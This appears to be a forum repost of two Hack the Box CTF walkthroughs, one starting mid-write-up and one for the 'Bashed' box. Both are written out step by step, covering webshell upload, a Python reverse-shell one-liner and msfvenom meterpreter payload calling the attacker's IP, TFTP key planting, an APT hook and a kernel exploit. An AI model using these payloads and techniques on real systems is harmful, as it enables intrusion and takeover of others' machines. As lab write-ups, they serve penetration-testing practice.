![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-xBpBVpafVwM/WuiKOCap4UI/AAAAAAAAWn0/594qvbNjV207jiyEqezpJ4bqE9CEhukSQCLcBGAs/s1600/13.png?w=687&ssl=1)
Type following command for cracking hash value with the help of /rockyou.txt
john hash --wordlist=/usr/share/wordlists/rockyou.txt
1
john hash --wordlist=/usr/share/wordlists/rockyou.txt
Great!! It gives “babygurl69”
![[Image: 16.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-ACDO4G_rx3A/WuiKOHfaX3I/AAAAAAAAWnw/wW4bipTuAvo4zh5sOOrVGL300zIVPxOkACLcBGAs/s1600/16.png?w=687&ssl=1)
So currently we have our username “webdav_tester” and the password “babygurl69” for login into / webdev_test_inception and authentication type is also basic therefore we can use cadaver for uploading backdoor.
Type following command for uploading php backdoor:
cadaver
[To see content please register here]
webdav_testerbabygurl69
put /root/Desktop/qsd-php-backdoor.php
1
2
3
4
cadaver
[To see content please register here]
webdav_testerbabygurl69
put /root/Desktop/qsd-php-backdoor.php
While uploading php backdoor we had tried so many types of php backdoor but among them, qsp-php-backdoor.php was working and it is default location is /usr/share/webshells/php.
![[Image: 17.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-j_vySetyTkc/WuiKOQJAajI/AAAAAAAAWn4/R1sCEiJZs8wlGNJbP9AOSnhU1zrY5K8IQCLcBGAs/s1600/17.png?w=687&ssl=1)
Then we open uploaded php shell in the browser and click on “go to current working directory”.
http://webdav_test_inception/qsd-php-backdoor.php
1
http://webdav_test_inception/qsd-php-backdoor.php
![[Image: 18.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-494gWC89Orw/WuiKO9lxf3I/AAAAAAAAWn8/2WITRyziTEMySpGYV8uX7MN6ApWWVNjVACLcBGAs/s1600/18.png?w=687&ssl=1)
It brings us into inside /html directory, where we saw wordpress 4.8.3 and opened it.
![[Image: 19.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-W-8sjSWq1J4/WuiKOwFdVNI/AAAAAAAAWoA/SAM4FAnGiPkkg0siwdmZRf4U72xmIR8OACLcBGAs/s1600/19.png?w=687&ssl=1)
Then we explore /wp-config.php file and found the username “root” and password “VwPddNh7xMZyDQoByQL4“. We also tried to login to WordPress but it was not active.
![[Image: 21.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-VqUuAgeZGkc/WuiKPlL_yWI/AAAAAAAAWoI/CUJ0n8CUW106qjwAJSoasdPqDlWkBHyDgCLcBGAs/s1600/21.png?w=687&ssl=1)
Again we came back to the previous page as shown below and type the following command inside execute shell text filed for identifying all running services inside the network.
netstat -antp
1
netstat -antp
![[Image: 22.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-UGLPzAPf3M4/WuiKP_kjyII/AAAAAAAAWoM/68BCFQ-LK_0zfKoFql_FfDlKhzZjphjwQCLcBGAs/s1600/22.png?w=687&ssl=1)
Here we found ssh is open inside internal network and also observed new interface 192.168.0.10
![[Image: 23.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-AzDpfr1p3zM/WuiKPyPwIYI/AAAAAAAAWoQ/BYeF105IoOwUnONgjqtH3HvQhj7iX-o0gCLcBGAs/s1600/23.png?w=687&ssl=1)
Since we know port 3128 is open for squid HTTP proxy, so now open /etc/proxy.conf to add that inside it as shown below in the image.
![[Image: 24.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-HfQgwUINITI/WuiKQIm1QRI/AAAAAAAAWoU/fQ_FBCIqEP4uYctJnYLTzDnLXwg5GczKwCLcBGAs/s1600/24.png?w=687&ssl=1)
Now connect to ssh through proxychains by using below command and submit password that was found from inside /wp-config.php for user cobb.
proxychains ssh [email protected]
1
proxychains ssh [email protected]
Nice!!! It works and we logged in successfully, let’s grab the user.txt first as shown.
![[Image: 25.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-A2y7wbsP8xg/WuiKQjJWGEI/AAAAAAAAWoY/o5kIAYTvvaMG_2WajWlZDCkCuzuW9K5QgCLcBGAs/s1600/25.png?w=687&ssl=1)
Then for finding root.txt flag, we need privilege escalation, therefore, type sudo -l command which will tell you sets permission for user cobb. And you will see that Cobb has ALL permissions. Then further we execute sudo su and got root access and move for root.txt file.
Dammitttttttt!!!!! It was a bloody trap, not original root access.
![[Image: 26.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-OnzM6zplamQ/WuiKQ0Qim5I/AAAAAAAAWoc/eE1UZRZPxUQZIT65kfKrAC4f6rD89TkawCLcBGAs/s1600/26.png?w=687&ssl=1)
ifconfig tells us IP is 192.168.0.10 and then we ping thought to ping 192.168.0.1, and the host was up.
![[Image: 27.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-_s1Cz-GU5aY/WuiKROmP71I/AAAAAAAAWog/_L4GJzros2olNhy151aWULSXh32z-9TWwCLcBGAs/s1600/27.png?w=687&ssl=1)
Then with help of the following command, we came to know port 21, 22 and 53 were opened.
nc -zv 192.168.0.1 1-65535 &> results && cat results | grep succeeded
1
nc -zv 192.168.0.1 1-65535 &> results && cat results | grep succeeded
We successfully login into FTP by using anonymous: anonymous and run ls command for looking all directories and files.
![[Image: 29.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-0EaXImdrq6o/WuiKRQMZ6FI/AAAAAAAAWok/fmdsKp5D5gMNUtDoeL9t7dJAA9fEnui1ACLcBGAs/s1600/29.png?w=687&ssl=1)
Inside /etc we saw three files: passwd, crontab and tftpd-hpa in /default. We downloaded all three files.
cd /etc
get passwd
get crontab
cd default
get tftpd-hpa
1
2
3
4
5
cd /etc
get passwd
get crontab
cd default
get tftpd-hpa
![[Image: 30.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/--yTEaIKmRHs/WuiKRyJ3h4I/AAAAAAAAWos/1fFmxtSyy_M7skSIP2wos9_ewnd7A1aQQCLcBGAs/s1600/30.png?w=687&ssl=1)
Then read all three file through cat
cat /etc/passwd
cat /default/tftpd-hpa
1
2
cat /etc/passwd
cat /default/tftpd-hpa
![[Image: 31.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-liLjN1OPSM8/WuiKSQ6kD_I/AAAAAAAAWow/fQ14WVTnijUjzqO5WjHU8WIQe5p5iw3SgCLcBGAs/s1600/31.png?w=687&ssl=1)
cat crontab
1
cat crontab
Here we saw something very interested that every 5 minutes apt-update command is running.
![[Image: 32.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-HYa7f6iPAsY/WuiKS525qEI/AAAAAAAAWo4/Z8FbvA7UH_gLnrsURsC-eIByflQSbsrrgCLcBGAs/s1600/32.png?w=687&ssl=1)
Then we generated ssh key by executing the following command:
ssh-keygen
1
ssh-keygen
![[Image: 33.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-jt7osdrJkEg/WuiKSrFMI4I/AAAAAAAAWo0/mYoymdbesYsir2_ivwbCgy-w3K018c8OACLcBGAs/s1600/33.png?w=687&ssl=1)
Now enter following commands for uploading public key on 192.168.0.1 using TFTP:
cd /root/.ssh
tftp 192.168.0.1
put id_rsa.pub /root/.ssh/authorized_keys
1
2
3
cd /root/.ssh
tftp 192.168.0.1
put id_rsa.pub /root/.ssh/authorized_keys
Since TFTP gives all permission to the authorized key which means anyone can read and write it as result ssh public key get fail due to incorrect permission, it should 600. Now exit from tftp and change authorized key permission in the current host machine.
quit
1
quit
We were not much sure how to change permission through apt-update command, therefore, we search in Google and luckily found a
[To see content please register here]
that helps us in generating apt update command for changing authorized key permission.echo 'APT::Update:
re-Invoke {"chmod 600 /root/.ssh/authorized_keys"};' > rootshelltftp 192.168.0.1
put rootshell /etc/apt/apt.conf.d/rootshell
quit
ssh [email protected]
1
2
3
4
5
echo 'APT::Update:
re-Invoke {"chmod 600 /root/.ssh/authorized_keys"};' > rootshelltftp 192.168.0.1
put rootshell /etc/apt/apt.conf.d/rootshell
quit
ssh [email protected]
Wait for 5 mins and then you will get root access. After that grab the root.txt flag and Hit the GOAL!!!
![[Image: 34.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-qbv44xPid3M/WuiKTM4vxOI/AAAAAAAAWo8/LGPpay_K4g8KWgY25C26xJWToz6zlf2rwCLcBGAs/s1600/34.png?w=687&ssl=1)
Hello Friends!! Today we are going to solve a CTF Challenge “Bashed”. It is a lab that is developed by Hack the Box. They have an amazing collection of Online Labs, on which you can practice your penetration testing skills. They have labs which are designed for beginners to the expert penetration testers. Bashed is a Retired Lab.
Level: Medium
Task: Find the user.txt and root.txt in the vulnerable Lab.
Let’s Begin!
As these labs are only available online, therefore, they have a static IP. Bashed Lab has IP: 10.10.10.68.
Now, as always let’s begin our hacking with the port enumeration.
nmap -A 10.10.10.68
1
nmap -A 10.10.10.68
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-Y1K8jfHZTMg/WudTCbI6DYI/AAAAAAAAWl4/k2BXoUx09mIhPfmINoudKjUFqwNuzqEKgCLcBGAs/s1600/1.png?w=687&ssl=1)
Knowing port 80 is open on the victim’s network we preferred to explore his IP in the browser and the following image opened as shown below.
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-Yed0oh7eMqw/WudTFslzIsI/AAAAAAAAWmo/XpIpjZz4YesXF6qakwXuhDmeRtxSnn-UQCLcBGAs/s1600/2.png?w=687&ssl=1)
Next, we use the dirb tool of kali to enumerate the directories and found some important directories such as /dev
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-fGffqqLXSZM/WudTFJH54iI/AAAAAAAAWmk/qqixsG2gtTYM9xrcag4cBwFRtZyYC4KGgCLcBGAs/s1600/3.png?w=687&ssl=1)
So when you will open /dev directory in the browser, you will get a link for phpbash.php. Click on that link.
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-SQEf-Kv3XYk/WudTFxKLTEI/AAAAAAAAWmw/jyefmAyTcoICd5xbSdM9FgQLHRyLGx-egCLcBGAs/s1600/4.png?w=687&ssl=1)
It will redirect to the following page as shown below, which seems like a shell interacting through the browser.
After that, you can execute any os arbitrary command for testing whether it’s working or not. We have run ls command to check the present list in the current directory.
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-xvQXy9_j96k/WudTF52G7FI/AAAAAAAAWms/A-LdM1775I8np7_EuSf3h5f1AJrFXosxACLcBGAs/s1600/5.png?w=687&ssl=1)
Inside /html directory we found uploads folder and hence now we can easily compromise the target’s system by uploading backdoor.
![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-F9qLB8RhGbE/WudTGAI7lbI/AAAAAAAAWm0/e74uoJCySZUECcuLv8qQDpVC1ZgkZf37ACLcBGAs/s1600/6.png?w=687&ssl=1)
Using msfvenom we had created a malicious shell.php file by executing following command.
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.28 lport=4444 -f raw
1
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.28 lport=4444 -f raw
Simultaneously run multi/handler for reverse connection of the victim’s system.
![[Image: 7.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-h2paU69-4HU/WudTGp2tR8I/AAAAAAAAWm8/zH7gSKPhRQ0RCsH_d3u_dQJcEkwVy1LHACLcBGAs/s1600/7.png?w=687&ssl=1)
We had used Python HTTP server for transferring file, you can also use an alternative method for transferring and download the malicious file from wget inside uploads directory.
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-Oxrjvh3O9ok/WudTGbBi0uI/AAAAAAAAWm4/onpZrzep4_Av73dmml40BLlRjfw5ubn-wCLcBGAs/s1600/9.png?w=687&ssl=1)
Now execute the malicious file shell.php from the browser as shown below and move to Metasploit framework for reverse connection.
![[Image: 10.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-EYvwcE36G0A/WudTCp1SguI/AAAAAAAAWl8/xZmiDoZZy6EE3jR9wcxrGF3yA8xuR0aagCLcBGAs/s1600/10.png?w=687&ssl=1)
After executing uploaded backdoor file come back to the Metasploit framework and wait for the meterpreter session.
msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 10.10.14.28
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit
1
2
3
4
5
msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 10.10.14.28
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit
From given below image you can observe meterpreter session1 opened for accessing victim tty shell.
Now let’s finish the task by grabbing user.txt and root.txt file. First I move into /home directory and check available files and directories inside it.
cd /home
ls
1
2
cd /home
ls
Here one directories arrexel, when I explore /home/arrexel I saw user.txt and use cat command for reading.
cd arrexel
ls
cat user.txt
1
2
3
cd arrexel
ls
cat user.txt
Great!! Here we had completed 1st task now move to 2nd task
![[Image: 11.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-alG01DLs4dA/WudTCmqDqVI/AAAAAAAAWmA/iWP2QNxzsLU4MIJbUvuv-SmMLepLdVTGQCLcBGAs/s1600/11.png?w=687&ssl=1)
For spawning proper tty shell of target’s system we need to import python file, therefore, I run following command inside the meterpreter shell
shell
python -c 'import pty;pty.spawn("/bin/bash")'
lsb_release -a
1
2
3
shell
python -c 'import pty;pty.spawn("/bin/bash")'
lsb_release -a
![[Image: 12.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-QpT-yMHiKQc/WudTDfwMVqI/AAAAAAAAWmM/zSmIkqCpiyAAu8LYwThExhubuLSSjDmIgCLcBGAs/s1600/12.png?w=687&ssl=1)
Run ls -al command to observe all directories with their permissions. Here you will notice the user scriptmanager has permission for accessing /scripts directory.
![[Image: 13.0.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-EHfX4SFl1Ek/WudTDNY44hI/AAAAAAAAWmE/WgxZBRX6KSYNNoB99PX8PntCLCfUqZXRQCLcBGAs/s1600/13.0.png?w=687&ssl=1)
When we tried to open /scripts directory as the default user, it showed Permission Denied message. Then run sudo -l command which will tell us that the scriptmanager has No password for all the things.
Then we run the following command for penetrating scripts folder with help of scriptmanager
sudo -u scriptmanager ls /scripts
sudo -u scriptmanager cat /scripts/test.py
sudo -u scriptmanager cat /scripts/test.txt
1
2
3
sudo -u scriptmanager ls /scripts
sudo -u scriptmanager cat /scripts/test.py
sudo -u scriptmanager cat /scripts/test.txt
Since we found a python file, therefore, our strategy will be to replace the original test.py file from malicious python file to have a reverse connection over netcat and for that, you need to save following code in a text file.
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.28",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
1
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.28",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Save this file with .py extension and transfer it into the victim’s system and start netcat on listening port.
Note: Replace 10.10.14.28 from inside the code into your VPN IP.
![[Image: 13.1.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-XX-t_7pPb-E/WudTDEJaDnI/AAAAAAAAWmI/efAK1DG_IrgQVwYtklz0Tb4d1KpI0xv2wCLcBGAs/s1600/13.1.png?w=687&ssl=1)
Now download malicious python file inside /tmp
wget
[To see content please register here]
1
wget
[To see content please register here]
And then copy the root.py from inside /tmp into test.py in /script with the help of the following command.
sudo -u scriptmanager cp /tmp/root.py /scripts/test.py
1
sudo -u scriptmanager cp /tmp/root.py /scripts/test.py
![[Image: 13.2.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-SkAb9C-fVaU/WudTD7cbi4I/AAAAAAAAWmQ/fBScC_h-UeYaM_oIUmeZbC8i4fUKOBgdACLcBGAs/s1600/13.2.png?w=687&ssl=1)
After some time you will get reverse to connect at netcat terminal with root access. Now finish the task by capturing the root.txt file as shown below.
nc -lvp 1234
id
cd /root<span style="vertical-align: inherit;"><span style="vertical-align: inherit;">
ls</span></span>
cat root.txt
1
2
3
4
5
nc -lvp 1234
id
cd /root<span style="vertical-align: inherit;"><span style="vertical-align: inherit;">
ls</span></span>
cat root.txt
![[Image: 13.3.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-5sg9CjPxRK0/WudTD9nNMhI/AAAAAAAAWmU/zgWTOo4ogH49fVDSigHa4S3joX-ye7LmACLcBGAs/s1600/13.3.png?w=687&ssl=1)
2nd Method for finding the root.txt flag.
We have found machine architecture 14.0 in the above method. So we start looking for a related kernel exploit in Google and luckily found an exploit from
[To see content please register here]
for root privilege escalation.Copy and paste the whole text inside a text file and save as poc.c
![[Image: 13.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-2ZSdLzyWS0E/WudTESbfkpI/AAAAAAAAWmY/aJvAW2-K5lY_hTRBsQfufWnG1YuwhtIRACLcBGAs/s1600/13.png?w=687&ssl=1)
After that compile it with help of the following command:
gcc poc.c -o pwn
1
gcc poc.c -o pwn
Run python HTTP server for transferring it into targets system.
![[Image: 14.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-9r3e1-kDiJc/WudTEtg3QDI/AAAAAAAAWmc/xoV8s6Iw40oTkPuUbEEI7bNScKZZO0wNACLcBGAs/s1600/14.png?w=687&ssl=1)
At last, download complied file pwn into the target machine from wget inside /dev/shm as shown in the image then give full permission and run the file.
wget
[To see content please register here]
chmod 777 pwn./pwn
1
2
3
wget
[To see content please register here]
chmod 777 pwn./pwn
It will give you root access, now catch the root.txt flag as soon as possible because it will crash the kernel after some time.
cd /root
cat root.txt
1
2
cd /root
cat root.txt
Superb!! We had completed the task and hacked this box.
![[Image: 15.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-RNTgMOva2RQ/WudTE6e1ieI/AAAAAAAAWmg/P2a1rZIZBX4Ws-ZlYniujQygY4Lfuw5VgCLcBGAs/s1600/15.png?w=687&ssl=1)